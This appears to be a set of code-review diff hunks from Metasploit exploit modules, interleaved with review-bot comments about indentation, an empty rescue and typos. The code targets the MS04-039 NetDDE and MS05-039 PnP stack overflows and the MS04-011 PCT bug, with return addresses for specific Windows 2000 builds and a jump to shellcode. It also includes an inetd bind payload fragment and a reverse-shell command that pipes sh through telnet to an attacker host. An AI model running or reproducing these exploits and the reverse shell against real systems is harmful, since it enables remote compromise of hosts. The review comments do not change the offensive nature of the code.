NDR.UnicodeConformantVaryingString('') +
Rex::Text.rand_text(528) +
Rex::Text.rand_text(528) +
NDR.long(rand(0xFFFFFF))
print_status('sending exploit ...')
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok ...')
end
print_status('sending exploit ...')
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok ...')
end
# Perform any required client-side payload handling
handler
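Review bot: The bare `when` on the line before `print_status("No target is available for #{ os }")` is not an `else`: Ruby skips the newline after `when`, so the `print_status` call becomes the `when` expression, the message is printed whenever no earlier branch matched, its result is compared against `os` with `===` and does not match, and the following `return` never runs — `stub` is then built from the empty `string` and sent anyway. That line should read `else`. `response = dcerpc_call(9, stub)` is also assigned but never read. The hunk only re-indents these lines; the `exploit` method starts before the first hunk shown.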


@ -4,7 +4,7 @@ module Msf
class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
include Exploit::Remote::SMB
include Exploit::Remote::SMB
include Exploit::Remote::DCERPC
def initialize(info = {})
@ -12,9 +12,9 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
'Name' => 'Microsoft Network Dynamic Data Exchange Server MS04-031',
'Description' => %q{
This module exploits a stack overflow in the NetDDE service, which is the
precursor tothe DCOM interface. This exploit effects only Pre-Windows XP
SP1 operating systems. Also, despite Microsoft's claim that this is PreAuth,
Auth seems to be required to reach the nddeapi entrypoint.
precursor tothe DCOM interface. This exploit effects only Pre-Windows XP
SP1 operating systems. Also, despite Microsoft's claim that this is PreAuth,
Auth seems to be required to reach the nddeapi entrypoint.
},
'Author' => [ 'pusscat' ],
'License' => MSF_LICENSE,
@ -27,15 +27,15 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => (0x600 - (133*4) - 4),
'BadChars' => "\\/.:$\x00", # \ / . : $ NULL
'Prepend' => 'A' * 8,
'Space' => (0x600 - (133*4) - 4),
'BadChars' => "\\/.:$\x00", # \ / . : $ NULL
'Prepend' => 'A' * 8,
},
'Targets' =>
[
@ -48,43 +48,42 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nddeapi']),
], self.class)
register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nddeapi']),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
retOverWrite =
'AA' + (NDR.long(target['Rets'][0]) * 133) + payload.encoded
retOverWrite =
'AA' + (NDR.long(target['Rets'][0]) * 133) + payload.encoded
overflowChunk =
retOverWrite +
NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
NDR.long(0x0)
overflowChunk =
retOverWrite +
NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null.
NDR.long(0x0)
stubdata =
NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
NDR.long(rand(0xFFFFFFFF))
stubdata =
NDR.UnicodeConformantVaryingStringPreBuilt(overflowChunk) +
NDR.long(rand(0xFFFFFFFF))
print_status('sending exploit ...')
begin
response = dcerpc.call(0xc, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
print_status('sending exploit ...')
handler
disconnect
begin
response = dcerpc.call(0xc, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end
handler
disconnect
end
end
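Review bot: The `rescue Rex::Proto::DCERPC::Exceptions::NoResponse` in `exploit` has an empty body, unlike the LSASS and PNP modules in this same commit, which print a status line on that exception; an empty rescue hides whether the call was even attempted, so at least `print_status('Server did not respond, but that should be ok ...')` belongs there, and the unused `response` assignment can go. The context also disagrees with itself: the class is `MS04_039_NETDDE` while `'Name'` says `MS04-031`; one of the two identifiers is wrong and should be checked against the advisory. The `'Description'` string carries the typos `tothe` and `effects` (for `affects`).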


@ -46,38 +46,36 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
# -ws2ord XXX?
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm
{
'Platform' => 'win',
'Ret' => 0x767a38f6, # umpnpmgr.dll
},
],
[
'Windows 2000 SP4 French',
{
'Platform' => 'win',
'Ret' => 0x767438f6, # French target by ExaProbe <fmourron@exaprobe.com>
},
],
[
'Windows 2000 SP4 Spanish',
{
'Platform' => 'win',
'Ret' => 0x767738f6, # umpnpmgr.dll
},
],
[
'Windows 2000 SP0-SP4 German',
{
'Platform' => 'win',
'Ret' => 0x767338f6, # German target by Michael Thumann <mthumann@ernw.de>
},
],
],
'DefaultTarget' => 0,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 9 2005'))
register_options(
@ -90,48 +88,50 @@ class Exploits::Windows::Smb::MS05_039_PNP < Msf::Exploit::Remote
def pnp_probe(req)
connect()
handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# CS_DES
cs_des = NDR.long(0) + # CSD_SignatureLength
NDR.long(0) + # CSD_LegacyDataOffset
NDR.long(req.length) + # CSD_LegacyDataSize
NDR.long(0) + # CSD_Flags
Rex::Text.rand_text(16) + # GUID
req # CSD_LegacyData
cs_des =
NDR.long(0) + # CSD_SignatureLength
NDR.long(0) + # CSD_LegacyDataOffset
NDR.long(req.length) + # CSD_LegacyDataSize
NDR.long(0) + # CSD_Flags
Rex::Text.rand_text(16) + # GUID
req # CSD_LegacyData
# PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0);
# ResourceName:
stubdata = NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific
NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure)
NDR.long(cs_des.length) + # ResourceLen
NDR.long(4) + # OutputLen (at least 4)
NDR.long(0) # Flags
stubdata =
NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID
NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific
NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure)
NDR.long(cs_des.length) + # ResourceLen
NDR.long(4) + # OutputLen (at least 4)
NDR.long(0) # Flags
begin
dcerpc.call(0x36, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('server did not respond, but we do not expect it to.')
else
print_status('should be owned now...')
end
begin
dcerpc.call(0x36, stubdata)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('server did not respond, but we do not expect it to.')
else
print_status('should be owned now...')
end
# Cleanup
handler
disconnect
if (dcerpc.last_response != nil and
dcerpc.last_response.stub_data != nil and
dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
return true
else
return false
end
if (dcerpc.last_response != nil and
dcerpc.last_response.stub_data != nil and
dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
return true
else
return false
end
end
def check


@ -121,7 +121,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
# 8f8201000000 => pop [esi+1]
# eb0f => jmp short 11 to shellcode
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+
"\xeb\x0f" + 'XXXXXXXXXXX' +
[target.ret ^ 0xffffffff].pack('V')+
payload.encoded


@ -66,7 +66,7 @@ module BindInetd
# Next try the Irix inetd path
"/usr/etc/inetd -s #{tmp_inet};" +
# Overwrite services with the "clean" version
# Overwrite services with the "clean" version
"cp #{tmp_services} /etc/services;" +
# Delete our configuration file


@ -45,9 +45,9 @@ module Reverse
def command_string
cmd =
"sleep 7200|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
return cmd
end